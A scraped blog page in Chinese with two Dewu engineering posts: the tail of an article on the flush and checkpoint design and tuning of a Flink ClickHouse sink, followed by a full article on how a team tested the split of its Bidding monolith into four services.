        sinkManager.flush();
    }
    // 此时 Checkpoint 才能标记为成功
    logger.info("doing snapshot. flush sink to ck");
}

Flush 实现与并发协调

public class ClickHouseSinkManager {
    public void flush() {
        //  步骤1:暂停定时清理任务
        clickHouseSinkScheduledCheckerAndCleaner.beforeFlush(); // isFlushing = true
        try {
            //  步骤2:执行 buffer flush + 等待所有写入完成
            clickHouseWriter.waitUntilAllFuturesDone(falsefalse);
        } finally {
            //  步骤3:恢复定时清理任务(finally 确保执行)
            clickHouseSinkScheduledCheckerAndCleaner.afterFlush(); // isFlushing = false
        }
    }
}

并发协调详解:

// cleaner 线程执行流程
synchronized (this) {
    if (isFlushing) {
        return// Checkpoint 期间跳过本次执行
    }
    // 正常执行:清理已完成的 Future + 触发 Buffer flush
    futures.removeIf(filter);
    buffers.forEach(Buffer::tryAddToQueue);
}

关键点:

  • volatile 可见性: isFlushing 使用 volatile 确保 cleaner 线程立即看到状态变化。
  • synchronized互斥: getTask()方法体使用 synchronized (this) 确保原子性。
  • 标志位协调: 通过 beforeFlush() / afterFlush() 管理标志位。
  • finally 保证恢复: 即使 flush 异常,也会在 finally 中恢复 cleaner。

等待所有 Future 完成

public synchronized void waitUntilAllFuturesDone(boolean stopWriters, boolean clearFutures) {
    try {
        // 循环等待:直到所有 Future 完成 + 队列清空
        while (!futures.isEmpty() || unProcessedCounter.get() > 0) {
            CompletableFuture<Void> all = FutureUtil.allOf(futures);
            // 最多等待 3 分钟(与 Future 超时一致)
            all.get(3, TimeUnit.MINUTES);
            // 移除已完成的 Future(非异常)
            futures.removeIf(f -> f.isDone() && !f.isCompletedExceptionally());
            // 检查是否有异常 Future
            if (anyFutureFailed()) {
                break; // 有异常则退出
            }
        }
    } finally {
        if (stopWriters) stopWriters();
        if (clearFutures) futures.clear();
    }
}

关键逻辑:

  • 循环等待直到所有 Future 完成 + 队列清空。
  • 超时 3 分钟(与 Future 超时一致)。
  • 移除已完成的非异常 Future。
  • 有异常时退出循环。

三种 Flush 触发方式对比

Checkpoint 参数配置

// Checkpoint 配置建议
StreamExecutionEnvironment env = StreamExecutionEnvironment.getExecutionEnvironment();
// 启用 Checkpoint(间隔 1 分钟)
env.enableCheckpointing(60000);
// Checkpoint 超时(必须大于 Future 超时 + 重试时间)
// 建议:CheckpointTimeout > FutureTimeout * MaxRetries
env.getCheckpointConfig().setCheckpointTimeout(600000); // 10 分钟
// 一致性模式
env.getCheckpointConfig().setCheckpointingMode(CheckpointingMode.EXACTLY_ONCE);
// 最小间隔(避免过于频繁)
env.getCheckpointConfig().setMinPauseBetweenCheckpoints(30000); // 30 秒
// 最大并发 Checkpoint 数
env.getCheckpointConfig().setMaxConcurrentCheckpoints(1);

语义保证

推荐配置:

生产环境: 使用 ExceptionsThrowableSink + Checkpoint。

允许部分丢失: 使用 UnexceptionableSink。

十、最佳实践与调优

生产配置

// ========== ClickHouse 连接参数 ==========
clickhouse.sink.target-table = tb_logs_local
clickhouse.sink.max-buffer-size104857600        // 批次大小
clickhouse.sink.table-count0                // 0 表示不分表
// ========== 写入性能参数 ==========
clickhouse.sink.num-writers10               // 写入线程数
clickhouse.sink.queue-max-capacity10        // 队列容量
clickhouse.sink.timeout-sec30               // flush 超时
clickhouse.sink.retries10                   // 最大重试次数
clickhouse.sink.check.timeout-sec30         // 定时检查间隔
// ========== 异常处理参数 ==========
clickhouse.sink.ignoring-clickhouse-sending-exception-enabledfalse
clickhouse.sink.local-address-enabledtrue   // 启用本地表写入
// ========== ClickHouse 集群配置 ==========
clickhouse.access.hosts192.168.1.1:8123,192.168.1.2:8123,192.168.1.3:8123
clickhouse.access.user = default
clickhouse.access.password = ***
clickhouse.access.database = dw_xx_xx
clickhouse.access.cluster = default
// ========== HikariCP 连接池配置 ==========
connectionTimeout30000                      // 连接超时 30s
maximumPoolSize20                           // 最大连接数 20
minimumIdle2                                // 最小空闲 2
socket_timeout180000                        // Socket 超时 3mi

性能调优

故障排查

十一、总结

本文深入分析了 Flink ClickHouse Sink 的实现方案,核心亮点包括:

技术亮点

  • 连接池选型: 使用 HikariCP,性能优异,连接管理可靠。
  • Future 超时控制: orTimeout(3min) 防止永久阻塞。
  • 显式资源管理: Connection 和 PreparedStatement 显式关闭,防止连接泄漏。
  • 负载均衡优化: Shuffle 初始化 + 轮询选择,避免热点。
  • 异常处理增强: future.isDone() 检查,避免重复完成。
  • 本地表写入: 动态节点发现 + 故障剔除,写入性能提升。
  • 分片策略: 按表(应用)维度路由,独立缓冲和隔离。
  • 攒批优化: 双触发机制(大小 + 超时)+ 随机抖动。
  • 流量控制: 有界队列 + 线程池,实现背压。
  • 健壮重试: 递归重试 + 异常节点剔除 + 最大重试限制。

Checkpoint 语义

  • At-Least-Once: ExceptionsThrowableSink + Checkpoint。
  • At-Most-Once: UnexceptionableSink。
  • Exactly-Once: 需要配合 ClickHouse 事务(未实现)。

生产建议

  1. 必须: Checkpoint 时 flush,否则会丢数据。
  2. 推荐: 使用 HikariCP + 本地表写入。
  3. 推荐: 配置合理的超时(Future < Socket < Checkpoint)。
  4. 推荐: 监控队列大小、Future 失败率、重试次数。

该方案已在生产环境大规模验证,能够稳定支撑百万级 TPS 的日志写入场景。

往期回顾

1.服务拆分之旅:测试过程全揭秘|得物技术

2.大模型网关:大模型时代的智能交通枢纽|得物技术

3.从“人治”到“机治”:得物离线数仓发布流水线质量门禁实践

4.AI编程实践:从Claude Code实践到团队协作的优化思考|得物技术

5.入选AAAI-PerFM|得物社区推荐之基于大语言模型的新颖性推荐算法

文 /虚白

关注得物技术,每周更新技术干货

要是觉得文章对你有帮助的话,欢迎评论转发点赞~

未经得物技术许可严禁转载,否则依法追究法律责任。

服务拆分之旅:测试过程全揭秘|得物技术

作者 得物技术
2026年2月5日 14:47

一、引言

代码越写越多怎么办?在线等挺急的! Bidding-interface服务代码库代码量已经达到100w行!!

Bidding-interface应用是出价域核心应用之一,主要面向B端商家。跟商家后台有关的出价功能都围绕其展开。是目前出价域代码量最多的服务。

随着出价业务最近几年来的快速发展,出价服务承接的流量虽然都是围绕卖家出价,但是已远远超过卖家出价功能范围。业务的快速迭代而频繁变更给出价核心链路高可用、高性能都带来了巨大的风险。

经总结有如下几个痛点:

  • 核心出价链路未隔离:

    出价链路各子业务模块间代码有不同程度的耦合,迭代开发可扩展性差,往往会侵入到出价主流程代码的改动。每个子模块缺乏独立的封装,而且存在大量重复的代码,每次业务规则调整,需要改动多处,容易出现漏改漏测的问题。

  • 大单体&功能模块定义混乱:

    历史原因上层业务层代码缺乏抽象,代码无法实现复用,需求开发代码量大,导致需求估时偏高,经常出现20+人日的大需求,需求开发中又写出大量重复代码,导致出价服务代码库快速膨胀,应用启动耗时过长,恶性循环。

  • B/C端链路未隔离:

    B端卖家出价链路流量与C端价格业务场景链路流量没有完全隔离,由于历史原因,有些B端出价链路接口代码还存在于price应用中,偶尔B端需求开发会对C端应用做代码变更。存在一定的代码管控和应用权限管控成本。

  • 发布效率影响:

    代码量庞大,导致编译速度缓慢。代码过多,类的依赖关系更为复杂,持续迭代逐步加大编译成本,随着持续迭代,新的代码逻辑 ,引入更多jar 依赖,间接导致项目部署时长变长蓝绿发布和紧急问题处理时长显著增加;同时由于编译与部署时间长,直接影响开发人员在日常迭代中的效率(自测,debug,部署)。

  • 业务抽象&分层不合理:

    历史原因出价基础能力领域不明确,出价底层和业务层分层模糊,业务层代码和出价底层代码耦合严重,出价底层能力缺乏抽象,上层业务扩展需求频繁改动出价底层能力代码。给出价核心链路代码质量把控带来较高的成本, 每次上线变更也带来一定的风险。

以上,对于Bidding服务的拆分和治理,已经箭在弦上不得不发。否则,持续的迭代会继续恶化服务的上述问题。

经过前期慎重的筹备,设计,排期,拆分,和测试。目前Bidding应用经过四期的拆分节奏,已经马上要接近尾声了。服务被拆分成三个全新的应用,目前在小流量灰度放量中。

本次拆分涉及:1000+Dubbo接口,300+个HTTP接口,200+ MQ消息,100+个TOC任务,10+个 DJob任务。

本人是出价域测试一枚,参与了一期-四期的拆分测试工作。

项目在全组研发+测试的ALL IN投入下,已接近尾声。值此之际输出一篇文章,从测试视角复盘下,Bidding服务的拆分与治理,也全过程揭秘下出价域内的拆分测试过程。

二、服务拆分的原则

首先,在细节性介绍Bidding拆分之前。先过大概过一下服务拆分原则:

  • 单一职责原则 (SRP):  每个服务应该只负责一项特定的业务功能,避免功能混杂。

  • 高内聚、低耦合:  服务内部高度内聚,服务之间松耦合,尽量减少服务之间的依赖关系。

  • 业务能力导向:  根据业务领域和功能边界进行服务拆分,确保每个服务都代表一个完整的业务能力。

拆分原则之下,还有不同的策略可以采纳:基于业务能力拆分、基于领域驱动设计 (DDD) 拆分、基于数据拆分等等。同时,拆分时应该注意:避免过度拆分、考虑服务之间的通信成本、设计合理的 API 接口。

服务拆分是微服务架构设计的关键步骤,需要根据具体的业务场景和团队情况进行综合考虑。合理的服务拆分可以提高系统的灵活性、可扩展性和可维护性,而不合理的服务拆分则会带来一系列问题。

三、Bidding服务拆分的设计

如引言介绍过。Bidding服务被拆分出三个新的应用,同时保留bidding应用本身。目前共拆分成四个应用:Bidding-foundtion,Bidding-interface,Bidding-operation和Bidding-biz。详情如下:

  • 出价基础服务-Bidding-foundation:

出价基础服务,对出价基础能力抽象,出价领域能力封装,基础能力沉淀。

  • 出价服务-Bidding-interfaces:

商家端出价,提供出价基础能力和出价工具,提供商家在各端出价链路能力,重点保障商家出价基础功能和出价体验。

  • 出价运营服务-Bidding-operation:

出价运营,重点支撑运营对出价业务相关规则的维护以及平台其他域业务变更对出价域数据变更的业务处理:

  1. 出价管理相关配置:出价规则配置、指定卖家规则管理、出价应急隐藏/下线管理工具等;
  2. 业务大任务:包括控价生效/失效,商研鉴别能力变更,商家直发资质变更,品牌方出价资质变更等大任务执行。
  • 业务扩展服务-Bidding-biz:

更多业务场景扩展,侧重业务场景的灵活扩展,可拆出的现有业务范围:国补采购单出价,空中成单业务,活动出价,直播出价,现订现采业务,预约抢购,新品上线预出价,入仓预出价。

应用拆分前后流量分布情况:

图片

四、Bidding拆分的节奏和目标收益

服务拆分是项大工程,对目前的线上质量存在极大的挑战。合理的排期和拆分计划是重点,可预期的收益目标是灵魂。

经过前期充分调研和规划。Bidding拆分被分成了四期,每期推进一个新应用。并按如下六大步进行:

图片

Bidding拆分目标

  • 解决Bidding大单体问题: 对Bidding应用进行合理规划,完成代码和应用拆分,解决一直以来Bidding大单体提供的服务多而混乱,维护成本高,应用编译部署慢,发布效率低等等问题。
  • 核心链路隔离&提升稳定性: 明确出价基础能力,对出价基础能力下沉,出价基础能力代码拆分出独立的代码库,并且部署在独立的新应用中,实现出价核心链路隔离,提升出价核心链路稳定性。
  • 提升迭代需求开发效率: 完成业务层代码抽象,业务层做组件化配置化,实现业务层抽象复用,降低版本迭代需求开发成本。
  • 实现出价业务应用合理规划: 各服务定位、职能明确,分层抽象合理,更好服务于企/个商家、不同业务线运营等不同角色业务推进。

预期的拆分收益

  • 出价服务应用结构优化:

    完成对Bidding大单体应用合理规划拆分,向下沉淀出出价基础服务应用层,降低出价基础能力维护成功;向上抽离出业务扩展应用层,能够实现上层业务的灵活扩展;同时把面向平台运营和面向卖家出价的能力独立维护;在代码库和应用层面隔离,有效减少版本迭代业务需求开发变更对应用的影响面,降低应用和代码库的维护成本。

  • 完成业务层整体设计,业务层抽象复用,业务层做组件化配置化,提升版本迭代需求开发效率,降低版本迭代需求开发成本:

    按业务类型对业务代码进行分类,统一设计方案,提高代码复用性,支持业务场景变化时快速扩展,以引导降价为例,当有类似降价换流量/降价换销量新的降价场景需求时,可以快速上线,类似情况每个需求可以减少10-20人日开发工作量。

  • 代码质量提升 :

    通过拆分出价基础服务和对出价流程代码做重构,将出价基础底层能力代码与上层业务层代码解耦,降低代码复杂度,降低代码冲突和维护难度,从而提高整体代码质量和可维护性。

  • 开发效率提升 :

    1. 缩短应用部署时间: 治理后的出价服务将加快编译和部署速度,缩短Bidding-interfaces应用发布(编译+部署)时间 由12分钟降低到6分钟,从而显著提升开发人员的工作效率,减少自测、调试和部署所需的时间。以Bidding服务T1环境目前一个月编译部署至少1500次计算,每个月可以节约150h应用发布时间。
    2. 提升问题定位效率: 出价基础服务层与上层业务逻辑层代码库&应用分开后,排查定位开发过程中遇到的问题和线上问题时可以有效缩小代码范围,快速定位问题代码位置。

五、测试计划设计

服务拆分的前期,研发团队投入了大量的心血。现在代码终于提测了,进入我们的测试环节:

为了能收获更好的质量效果,同时也为了不同研发、测试同学的分工。我们需要细化到最细粒度,即接口维度整理出一份详细的文档。基于此文档的基础,我们确定工作量和人员排期:

如本迭代,我们投入4位研发同学,2位测试同学。完成该200个Dubbo接口和100个HTTP接口,以及20个Topic迁移。对应的提测接口,标记上负责的研发、测试、测试进度、接口详细信息等内容。

基于该文档的基础上,我们的工作清晰而明确。一个大型的服务拆分,也变成了一步一步的里程碑任务。

接下来给大家看一下,关于Bidding拆分。我们团队整体的测试计划,我们一共设计了五道流程。

  • 第一关:自测接口对比:

    每批次拆分接口提测前,研发同学必须完成接口自测。基于新旧接口返回结果对比验证。验证通过后标记在文档中,再进入测试流程。

    对于拆分项目,自测卡的相对更加严格。由于仅做接口迁移,逻辑无变更,自测也更加容易开展。由研发同学做好接口自测,可以避免提测后新接口不通的低级问题。提高项目进度。

    在这个环节中。偶尔遇见自测不充分、新接口参数传丢、新Topic未配置等问题。(三期、四期测试中,我们加强了对研发自测的要求)。

  • 第二关:测试功能回归

    这一步骤基本属于测试的人工验证,同时重点需关注写接口数据验证。

    回归时要测的细致。每个接口,测试同学进行合理评估。尽量针对接口主流程,进行细致功能回归。由于迁移的接口数量多,历史逻辑重。一方面在接口测试任务分配时,要尽量选择对该业务熟悉的同学。另一方面,承接的同学也有做好历史逻辑梳理。尽量不要产生漏测造成的问题。

    该步骤测出的问题五花八门。另外由于Bidding拆分成多个新服务。两个新服务经常彼此间调用会出现问题。比如二期Bidding-foundation迁移完成后,Bidding-operation的接口在迁移时,依赖接口需要从Bidding替换成foundation的接口。

    灰度打开情况下,调用新接口报错仍然走老逻辑。(测试时,需要关注trace中是否走了新应用)。

  • 第三关:自动化用例

    出价域内沉淀了比较完善的接口自动化用例。在人工测试时,测试同学可以借助自动化能力,完成对迁移接口的回归功能验证。

    同时在发布前天,组内会特地多跑一轮全量自动化。一次是迁移接口开关全部打开,一次是迁移接口开关全部关闭即正常的自动化回归。然后全员进行排错。

    全量的自动化用例执行,对迁移接口问题拦截,有比较好的效果。因为会有一些功能点,人工测试时关联功能未考虑到,但在接口自动化覆盖下无所遁形。

  • 第四关:流量回放

    在拆分接口开关打开的情况下,在预发环境进行流量回放。

    线上录制流量的数据往往更加复杂,经常会测出一些意料之外的问题。

    迭代过程中,我们组内仍然会在沿用两次回放。迁移接口开关打开后回放一次,开关关闭后回放一次。(跟发布配置保持一致)。

  • 第五关:灰度过程中,关闭接口开关,功能回滚

    为保证线上生产质量,在迁移接口小流量灰度过程中。我们持续监测线上问题告警群。

    以上,就是出价域测试团队,针对服务拆分的测试流程。同时遵循可回滚的发布标准,拆分接口做了非常完善的灰度功能。下一段落进行介绍。

六、各流量类型灰度切量方案

出价流程切新应用灰度控制从几个维度控制:总开关,出价类型范围,channel范围,source范围,bidSource范围,uid白名单&uid百分比(0-10000):

  • 灰度策略
  • 支持 接口维度 ,按照百分比进行灰度切流;

  • 支持一键回切;

Dubbo接口、HTTP接口、TOC任务迁移、DMQ消息迁移分别配有不同的灰度策略。

七、结语

拆分的过程中,伴随着很多迭代需求的开发。为了提高迁移效率,我们会在需求排期后,并行处理迭代功能相关的接口,把服务拆分和迭代需求一起完成掉。

目前,我们的拆分已经进入尾声。迭代发布后,整体的技术项目就结束了。灰度节奏在按预期节奏进行~

值得一提的是,目前我们的流量迁移仍处于第一阶段,即拆分应用出价域内灰度迁移,上游不感知。目前所有的流量仍然通过bidding服务接口进行转发。后续第二阶段,灰度验证完成后,需要进行上游接口替换,流量直接请求拆分后的应用。

往期回顾

1.大模型网关:大模型时代的智能交通枢纽|得物技术

2.从“人治”到“机治”:得物离线数仓发布流水线质量门禁实践

3.AI编程实践:从Claude Code实践到团队协作的优化思考|得物技术

4.入选AAAI-PerFM|得物社区推荐之基于大语言模型的新颖性推荐算法

5.Galaxy比数平台功能介绍及实现原理|得物技术

文 /寇森

关注得物技术,每周一、三更新技术干货

要是觉得文章对你有帮助的话,欢迎评论转发点赞~

未经得物技术许可严禁转载,否则依法追究法律责任。

❌
❌